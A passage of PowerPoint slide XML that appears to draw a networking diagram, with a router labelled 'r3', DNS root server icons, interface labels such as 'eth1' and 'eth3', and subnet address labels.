            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9227" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4169EAA9-D465-6B67-FAA6-092160F5D3C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9229" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9B3F7F-4354-705F-71F4-6F144798CC2D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819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t-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9230" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F899B03-F97E-441F-E7DE-58BAED0E84C3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9231" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9972E79D-2BC6-0C73-7BAC-CF57933624E8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97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5">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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32" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBEAC5A2-4D09-A482-2D07-202657AC3840}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 1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32">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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33" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DFC9643-4A35-02D6-7A9D-8EF791E65C9E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28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2" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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34" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10068653-C32A-D07A-A8A6-9388CCA91DC8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 1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4">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9228" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E456DB83-C605-C400-DB72-D372158E0B43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9237" name="Gruppo 9236">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41AF1BA-9849-E331-5040-062C0C2A4844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5916482" y="3692248"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9239" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3DE1063-D097-86DF-0335-A5EAE5B0E451}"/>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9240" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123D024A-24AD-AC9F-6BA9-A5214418D9DD}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9241" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA3D08A-41D1-1D5A-ACEF-4F45405B4D07}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9242" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053E9A7F-E7DC-1E4B-AD5A-87E97C9BD142}"/>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dnsroot2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9244" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B90FAE-EE44-BA5F-3841-3A578BA394CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6235279" y="3210753"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9245" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BFE556A-5D32-7E1F-0216-6EECC48C5742}"/>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46" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2780808E-94FA-3C85-209F-F5867B56D2DA}"/>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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9247" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E560C3-C781-1F99-1902-240EDAF2208F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5539952" y="2918885"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9248" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9AAF950-30B1-2D56-5498-7BE7F349952C}"/>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eth3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9249" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98BA23CC-76E6-0E1F-6809-B1429A3BD1CA}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9250" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BE219D-93B4-C282-07DE-2ACEC821A45C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8998383" y="2927532"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9273" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8036C2B-9C82-BC04-CAD6-371ED73F2E56}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9275" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0485BE1-BF44-8CE9-3840-9AB74138F0FA}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9276" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC26A230-13B2-3FCD-9F88-3B2A00EDAB29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9646705" y="3337921"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9277" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F1B3AC-21E5-2D7A-2696-302D18D32B62}"/>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94" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75D3D9B0-BBB9-01F8-5F23-F2633D727599}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9299" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5FAB64-E8E4-61F4-9A5E-CBEBF39B15C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5725346" y="6015915"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9301" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C4FFE36-9875-A574-501A-D9ED6F0DBD10}"/>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306" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5178FA0-D8AE-E7C4-D753-F3ADA4356A90}"/>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
        <p:nvSpPr>
          <p:cNvPr id="9307" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E83DD0-9F73-C572-4BC2-7680D2A6EA54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6604255" y="2955119"/>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G</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9308" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B6C51CC-E6C0-7AA3-BDA5-0A52FF337D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9716991" y="6049162"/>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H</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9315" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B9DB37-FD77-C7D4-D84B-60C14E10D5C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6720678" y="2694193"/>
            <a:ext cx="2167360" cy="4596"/>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9316" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{106DEA10-E5B9-CE78-9BC8-119606A1AF33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6714600" y="2686926"/>
            <a:ext cx="0" cy="258512"/>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9317" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1328BD26-D02D-9175-E70E-08D3D7D5864E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8776956" y="2584226"/>
            <a:ext cx="122661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100.0.75.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9318" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298666BC-1EF5-2D4A-4409-B046FAB071F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9937681" y="6139640"/>
            <a:ext cx="1146468" cy="16991"/>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9322" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C60609-84ED-6F13-7322-5133E8506AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10694421" y="6014104"/>
            <a:ext cx="122661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130.100.00/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9323" name="Gruppo 9322">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70701ED-0F7A-8F44-1E23-04EB6CD8A1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7557227" y="3667061"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9324" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7292528-75CF-4E4E-5458-6E6AE14B7961}"/>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9326" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
